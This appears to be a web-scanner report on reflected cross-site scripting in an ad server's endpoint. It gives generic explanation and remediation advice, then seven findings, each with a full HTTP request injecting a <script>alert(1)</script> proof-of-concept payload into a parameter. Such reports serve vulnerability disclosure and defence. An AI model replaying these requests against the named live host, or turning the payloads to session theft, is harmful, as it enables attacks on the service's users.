Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the bgcolor request parameter is copied into the HTML document as plain text between tags. The payload a1db6<script>alert(1)</script>a89e0a8b1dc was submitted in the bgcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?cipid=7780291&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00a1db6<script>alert(1)</script>a89e0a8b1dc&fgcolor=e60066&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1 Host: oridtags2.admailtiser.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the cipid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b472e"><script>alert(1)</script>f4de99533c was submitted in the cipid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?cipid=b472e"><script>alert(1)</script>f4de99533c&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00&fgcolor=e60066&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1 Host: oridtags2.admailtiser.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the clickurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a58"><script>alert(1)</script>b7205bed805 was submitted in the clickurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?cipid=7780291&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00&fgcolor=e60066&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C13a58"><script>alert(1)</script>b7205bed805&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1 Host: oridtags2.admailtiser.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the crid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b0c"><script>alert(1)</script>2728a73d0ee was submitted in the crid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?cipid=7780291&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00&fgcolor=e60066&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497d7b0c"><script>alert(1)</script>2728a73d0ee&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1 Host: oridtags2.admailtiser.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the fgcolor request parameter is copied into the HTML document as plain text between tags. The payload d56be<script>alert(1)</script>8a50f2fbe8a was submitted in the fgcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?cipid=7780291&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00&fgcolor=e60066d56be<script>alert(1)</script>8a50f2fbe8a&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1 Host: oridtags2.admailtiser.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the subid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ada82"><script>alert(1)</script>48bc0c64bc2 was submitted in the subid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?cipid=7780291&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00&fgcolor=e60066&cilp=&subid=310305ada82"><script>alert(1)</script>48bc0c64bc2&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1 Host: oridtags2.admailtiser.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the tchannel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd86a"><script>alert(1)</script>3e1268a9356 was submitted in the tchannel parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?cipid=7780291&width=728&height=90&tchannel=fd86a"><script>alert(1)</script>3e1268a9356&auth=NTTO&bgcolor=33ff00&fgcolor=e60066&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1 Host: oridtags2.admailtiser.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3